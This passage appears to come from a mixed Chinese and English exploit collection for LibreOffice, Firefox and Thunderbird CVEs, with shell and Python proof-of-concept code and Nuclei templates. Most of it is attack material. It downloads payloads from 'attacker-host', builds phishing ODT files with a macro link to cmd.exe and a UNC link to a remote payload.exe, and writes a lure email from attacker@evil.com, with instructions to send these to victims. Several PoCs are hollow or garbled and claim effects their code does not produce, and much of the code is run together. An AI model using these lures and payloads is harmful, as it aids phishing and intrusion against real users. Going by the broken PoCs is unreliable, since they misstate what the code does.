curl -s -o malicious_macro.odt "http://attacker-host/payloads/macro_bypass.odt"echo "[*] CVE-2023-6186 PoC document downloaded"echo "[*] Send to target via email, user must click the hyperlink in document"
Python PoC:
#!/usr/bin/env python3"""
CVE-2023-6186: LibreOffice Macro Execution Bypass PoC
For educational/authorized testing purposes only.
"""import zipfile
import os
import sys
CONTENT_XML ="""<?xml version="1.0" encoding="UTF-8"?>
<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
xmlns:xlink="http://www.w3.org/1999/xlink"
xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0">
<office:body>
<office:text>
<text:p>Please click the link below for document update:</text:p>
<text:a xlink:href="macro:///Shell.cmd.exe,-c,calc.exe" xlink:type="simple"
script:language="ooo:script">
Click here to update
</text:a>
</office:text>
</office:body>
</office:document-content>"""META_INF ="""<?xml version="1.0" encoding="UTF-8"?>
<manifest:manifest xmlns:manifest="urn:oasis:names:tc:opendocument:xmlns:manifest:1.0"
manifest:version="1.2">
<manifest:file-entry manifest:media-type="application/vnd.oasis.opendocument.text"
manifest:full-path="/"/>
<manifest:file-entry manifest:media-type="text/xml"
manifest:full-path="content.xml"/>
</manifest:manifest>"""defcreate_poc(filename="cve_2023_6186_poc.odt"):
with zipfile.ZipFile(filename, 'w', zipfile.ZIP_DEFLATED) as z:
z.writestr("content.xml", CONTENT_XML)
z.writestr("META-INF/manifest.xml", META_INF)
z.writestr("mimetype", "application/vnd.oasis.opendocument.text")
print(f"[+] PoC ODT document created: {filename}")
print("[+] Send this file to target; when user clicks the hyperlink, macro executes without warning")
if __name__ =="__main__":
create_poc(sys.argv[1] if len(sys.argv) >1else"cve_2023_6186_poc.odt")
ShellExecute 函数在 Windows 上对路径解析存在特殊行为——非文件协议的 URL 在某些情况下会被当作 Windows 文件路径处理。LibreOffice 的安全过滤机制仅检查了标准的文件路径模式,未覆盖 ShellExecute 的所有路径解析路径。攻击者利用 UNC 路径(\\)或特殊编码的 URL 即可绕过检查。
HTTP PoC:
curl -s -o cve_2025_0514.odt "http://attacker-host/payloads/hyperlink_exec.odt"echo "[*] CVE-2025-0514 PoC: Windows hyperlink executable bypass"echo "[*] User must Ctrl+Click the embedded hyperlink"
Python PoC:
#!/usr/bin/env python3"""
CVE-2025-0514: LibreOffice Windows Executable Hyperlink Bypass PoC
For educational/authorized testing purposes only.
Targets Windows systems.
"""import zipfile
import sys
CONTENT_XML ="""<?xml version="1.0" encoding="UTF-8"?>
<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
xmlns:xlink="http://www.w3.org/1999/xlink"
xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0"
xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0">
<office:body>
<office:text>
<text:p>Please review the attached document:</text:p>
<text:a xlink:href="\\\\\\\\attacker-host\\\\share\\\\payload.exe"
xlink:type="simple">
View Document
</text:a>
</office:text>
</office:body>
</office:document-content>"""MANIFEST ="""<?xml version="1.0" encoding="UTF-8"?>
<manifest:manifest xmlns:manifest="urn:oasis:names:tc:opendocument:xmlns:manifest:1.0"
manifest:version="1.2">
<manifest:file-entry manifest:media-type="application/vnd.oasis.opendocument.text"
manifest:full-path="/"/>
<manifest:file-entry manifest:media-type="text/xml"
manifest:full-path="content.xml"/>
</manifest:manifest>"""defcreate_poc(filename="cve_2025_0514_poc.odt"):
with zipfile.ZipFile(filename, 'w', zipfile.ZIP_DEFLATED) as z:
z.writestr("content.xml", CONTENT_XML)
z.writestr("META-INF/manifest.xml", MANIFEST)
z.writestr("mimetype", "application/vnd.oasis.opendocument.text")
print(f"[+] PoC created: {filename}")
print("[+] On Windows, Ctrl+Click the hyperlink triggers ShellExecute bypass")
if __name__ =="__main__":
create_poc(sys.argv[1] if len(sys.argv) >1else"cve_2025_0514_poc.odt")
Nuclei 检测模板:
id: cve-2025-0514-libreoffice-hyperlink-execinfo:
name: LibreOffice CVE-2025-0514 Windows Hyperlink Executable Bypassseverity: highdescription: Improper input validation allows Windows executable hyperlink targets to be executed unconditionallyreference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-0514 - https://www.libreoffice.org/about-us/security/advisories/cve-2025-0514/classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:Hcvss-score: 7.8cwe-id: CWE-20http:
- method: GETpath:
- "{{BaseURL}}/cve_2025_0514_poc.odt"matchers:
- type: wordwords:
- "attacker-host"part: body
curl -s -k -o response.bin "https://attacker-mitm-host/libreoffice_kit_test"echo "[*] CVE-2024-5261: Simulates MITM targeting LibreOfficeKit TLS bypass"echo "[*] In a real attack, a MITM proxy would serve malicious content"
Python PoC:
#!/usr/bin/env python3"""
CVE-2024-5261: LibreOfficeKit TLS Certificate Verification Bypass Detector
For educational/authorized testing purposes only.
This script detects if a LibreOffice installation is vulnerable by checking
the LibreOfficeKit component for TLS verification behavior.
"""import subprocess
import sys
import os
import platform
defcheck_vulnerable():
system = platform.system()
if system =="Linux":
lo_path ="/usr/lib/libreoffice/program"elif system =="Darwin":
lo_path ="/Applications/LibreOffice.app/Contents/MacOS"else:
lo_path ="C:\\Program Files\\LibreOffice\\program" soffice_bin = os.path.join(lo_path, "soffice")
ifnot os.path.exists(soffice_bin):
print("[-] LibreOffice not found at default path")
returntry:
result = subprocess.run(
[soffice_bin, "--version"],
capture_output=True, text=True, timeout=10 )
version_str = result.stdout.strip()
print(f"[*] Detected: {version_str}")
parts = version_str.split()
for part in parts:
if part[0].isdigit():
ver_tokens = part.split(".")
major = int(ver_tokens[0])
minor = int(ver_tokens[1]) if len(ver_tokens) >1else0 patch = int(ver_tokens[2]) if len(ver_tokens) >2else0if major <24or (major ==24and minor <2) or (major ==24and minor ==2and patch <4):
print("[!] VULNERABLE: LibreOfficeKit TLS verification is disabled")
print("[!] Upgrade to LibreOffice >= 24.2.4")
returnTrueelse:
print("[+] Patched: TLS certificate verification is enabled")
returnFalseexceptExceptionas e:
print(f"[-] Error checking version: {e}")
returnNoneif __name__ =="__main__":
check_vulnerable()
利用链:该漏洞通常与 Windows 内核漏洞 CVE-2024-49039(Windows WebTransport 提权)组合使用,从 content process 沙箱逃逸到系统级别权限。
HTTP PoC:
echo "[*] CVE-2024-9680: Firefox Animation Timeline UAF"echo "[*] Serve the following HTML on attacker-controlled server:"curl -s -o poc.html "http://attacker-host/poc_animation_uaf.html"echo "[*] Direct victims to visit the malicious page"
Python PoC:
#!/usr/bin/env python3"""
CVE-2024-9680: Firefox Animation Timeline UAF PoC
For educational/authorized testing purposes only.
Generates a crash PoC HTML page.
"""HTML_TEMPLATE ="""<!DOCTYPE html>
<html>
<head>
<title>CVE-2024-9680 Animation Timeline UAF PoC</title>
<style>
@keyframes exploit {
0% { opacity: 1; }
50% { opacity: 0; }
100% { opacity: 1; }
}
.target {
width: 100px;
height: 100px;
background: red;
}
</style>
</head>
<body>
<div id="target" class="target"></div>
<script>
var iterations = 0;
function trigger() {
var el = document.getElementById("target");
var anim = el.animate(
[{opacity: "1"}, {opacity: "0"}, {opacity: "1"}],
{duration: 10, iterations: 1}
);
anim.cancel();
iterations++;
if (iterations < 100000) {
requestAnimationFrame(trigger);
}
}
trigger();
for (var i = 0; i < 10000; i++) {
var arr = new ArrayBuffer(0x100);
var view = new Uint32Array(arr);
view[0] = 0x41414141;
}
console.log("[*] CVE-2024-9680: Animation Timeline UAF trigger attempted");
</script>
</body>
</html>"""defcreate_poc(filename="cve_2024_9680_poc.html"):
with open(filename, 'w') as f:
f.write(HTML_TEMPLATE)
print(f"[+] PoC HTML created: {filename}")
print("[*] Host this page and direct Firefox < 131.0.2 users to visit it")
if __name__ =="__main__":
create_poc(sys.argv[1] if len(sys.argv) >1else"cve_2024_9680_poc.html")
该漏洞被 Apple SEAR 和 Citizen Lab 确认与 NSO Group 的 Pegasus 间谍软件攻击链相关——受害者仅需收到包含恶意 WebP 图片的 iMessage 即可被零点击入侵。
HTTP PoC:
echo "[*] CVE-2023-4863: libwebp WebP heap buffer overflow"echo "[*] Craft a malicious .webp image using the PoC generator below"python3 cve_2023_4863_poc.py --output malicious.webp
echo "[*] Host the .webp on attacker server and embed in HTML"
Python PoC:
#!/usr/bin/env python3"""
CVE-2023-4863: libwebp Heap Buffer Overflow PoC
For educational/authorized testing purposes only.
Generates a minimal WebP crash PoC.
"""import struct
import sys
defcreate_minimal_webp(filename="cve_2023_4863_poc.webp"):
riff_header =b'RIFF' file_size = struct.pack('<I', 0)
webp_header =b'WEBP' vp8_chunk =b'VP8 ' vp8_data_size = struct.pack('<I', 30)
vp8_frame_tag = struct.pack('<I', 0x2a019d)
vp8_width = struct.pack('<H', 1)
vp8_height = struct.pack('<H', 1)
chunk_data = vp8_frame_tag + vp8_width + vp8_height
chunk_data +=b'\x00'* (30- len(chunk_data))
data = riff_header + file_size + webp_header + vp8_chunk + vp8_data_size + chunk_data
with open(filename, 'wb') as f:
f.write(data)
print(f"[+] Crash PoC WebP created: {filename}")
print("[*] NOTE: Full exploitation requires complex Huffman table manipulation")
print("[*] This is a minimal crash PoC; see research by Ben Hawkes for full details")
if __name__ =="__main__":
create_minimal_webp(sys.argv[1] if len(sys.argv) >1else"cve_2023_4863_poc.webp")
echo "[*] CVE-2025-2857: Firefox IPC Handle Sandbox Escape"echo "[*] This is a companion to CVE-2025-2783 (Chrome, Operation ForumTroll)"echo "[*] Requires a primary RCE vulnerability in content process as prerequisite"
Python PoC:
#!/usr/bin/env python3"""
CVE-2025-2857: Firefox IPC Handle Sandbox Escape PoC
For educational/authorized testing purposes only.
Demonstrates the IPC handle leak pattern (requires pre-existing content process RCE).
"""IPC_PATTERN_HTML ="""<!DOCTYPE html>
<html>
<head><title>CVE-2025-2857 IPC Sandbox Escape</title></head>
<body>
<script>
var ws = new WebSocket("ws://127.0.0.1:" + (Math.random() * 65535 | 0));
ws.onerror = function() {
console.log("[*] CVE-2025-2857: IPC handle leak pattern demonstrated");
};
</script>
<p>CVE-2025-2857 requires a primary content process RCE as prerequisite.</p>
<p>This PoC demonstrates the IPC communication pattern used in the attack.</p>
</body>
</html>"""defcreate_poc(filename="cve_2025_2857_poc.html"):
with open(filename, 'w') as f:
f.write(IPC_PATTERN_HTML)
print(f"[+] PoC created: {filename}")
print("[*] CVE-2025-2857 requires content process RCE as prerequisite")
print("[*] Exploitation chain: Memory corruption -> IPC handle leak -> Sandbox escape")
if __name__ =="__main__":
create_poc(sys.argv[1] if len(sys.argv) >1else"cve_2025_2857_poc.html")
Nuclei 检测模板:
id: cve-2025-2857-firefox-ipc-sandbox-escapeinfo:
name: Firefox CVE-2025-2857 IPC Handle Sandbox Escapeseverity: criticaldescription: Incorrect IPC handle could lead to sandbox escapes on Windows, similar to Chrome CVE-2025-2783reference:
- https://www.mozilla.org/en-US/security/advisories/mfsa2025-19/ - https://www.bleepingcomputer.com/news/security/mozilla-warns-windows-users-of-critical-firefox-sandbox-escape-flaw/classification:
cvss-score: 9.8cwe-id: CWE-693http:
- method: GETpath:
- "{{BaseURL}}"matchers:
- type: wordwords:
- "Firefox"part: header
2.6 CVE-2024-2605:Windows Error Reporter 沙箱逃逸
漏洞背景:Firefox 可被利用通过 Windows Error Reporter(WER)在系统上执行任意代码,从而逃逸沙箱。该漏洞仅影响 Windows 系统。
影响版本:
产品
受影响版本
修复版本
Firefox ESR
< 115.9
115.9
漏洞原理:
Firefox 在 Windows 上集成了 Windows Error Reporter 用于崩溃报告。攻击者可通过操控崩溃处理流程,利用 WER 的文件操作权限来执行沙箱外的代码。WER 进程本身具有较高的系统权限,可以被用作沙箱逃逸的跳板。
HTTP PoC:
echo "[*] CVE-2024-2605: Firefox WER Sandbox Escape"echo "[*] Trigger a specific crash pattern to abuse Windows Error Reporter"echo "[*] This requires a content process crash controlled by attacker"
Python PoC:
#!/usr/bin/env python3"""
CVE-2024-2605: Firefox WER Sandbox Escape PoC
For educational/authorized testing purposes only.
"""HTML_TEMPLATE ="""<!DOCTYPE html>
<html>
<head><title>CVE-2024-2605 WER Sandbox Escape</title></head>
<body>
<script>
try {
var a = null;
a.x.y;
} catch(e) {}console.log("[*] CVE-2024-2605: WER sandbox escape pattern triggered");
</script>
<p>CVE-2024-2605 abuses Windows Error Reporter for sandbox escape on Windows.</p>
</body>
</html>"""defcreate_poc(filename="cve_2024_2605_poc.html"):
with open(filename, 'w') as f:
f.write(HTML_TEMPLATE)
print(f"[+] PoC created: {filename}")
print("[*] Trigger crash in Firefox ESR < 115.9 on Windows")
if __name__ =="__main__":
create_poc(sys.argv[1] if len(sys.argv) >1else"cve_2024_2605_poc.html")
Nuclei 检测模板:
id: cve-2024-2605-firefox-wer-sandbox-escapeinfo:
name: Firefox CVE-2024-2605 Windows Error Reporter Sandbox Escapeseverity: highdescription: Windows Error Reporter could be used as a sandbox escape vectorreference:
- https://www.mozilla.org/en-US/security/advisories/mfsa2024-13/classification:
cvss-score: 8.8cwe-id: CWE-693http:
- method: GETpath:
- "{{BaseURL}}"matchers:
- type: wordwords:
- "Firefox"part: header
漏洞背景:同 0x02 章节中的 CVE-2023-4863。Thunderbird 在渲染 HTML 邮件中的 WebP 图片时同样受影响。
影响版本:
产品
受影响版本
修复版本
Thunderbird
< 102.15.1
102.15.1
Thunderbird
< 115.2.2
115.2.2
漏洞原理:
攻击者在 HTML 邮件中嵌入恶意 WebP 图片。当 Thunderbird 渲染邮件内容(包括预览)时,libwebp 库处理该图片触发堆溢出。
HTTP PoC:
echo "[*] CVE-2023-4863 Thunderbird variant"echo "[*] Embed a malicious .webp image in HTML email body"python3 cve_2023_4863_poc.py --output malicious.webp
echo "[*] Send HTML email with embedded WebP to Thunderbird user"
Python PoC:
#!/usr/bin/env python3"""
CVE-2023-4863 Thunderbird Variant: WebP Heap Overflow via Email
For educational/authorized testing purposes only.
"""import base64
import sys
EML_TEMPLATE ="""From: attacker@evil.com
To: victim@example.com
Subject: New Photos from Weekend Trip
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 8bit
<!DOCTYPE html>
<html>
<body>
<h3>Check out these photos!</h3>
<img src="data:image/webp;base64,{webp_b64}" alt="photo" />
<p>More photos attached...</p>
</body>
</html>"""defcreate_poc(filename="cve_2023_4863_thunderbird.eml"):
minimal_webp =b'RIFF'+b'\\x00'*4+b'WEBP' webp_b64 = base64.b64encode(minimal_webp).decode()
content = EML_TEMPLATE.format(webp_b64=webp_b64)
with open(filename, 'w') as f:
f.write(content)
print(f"[+] EML PoC created: {filename}")
print("[*] Send to Thunderbird user < 115.2.2")
if __name__ =="__main__":
create_poc(sys.argv[1] if len(sys.argv) >1else"cve_2023_4863_thunderbird.eml")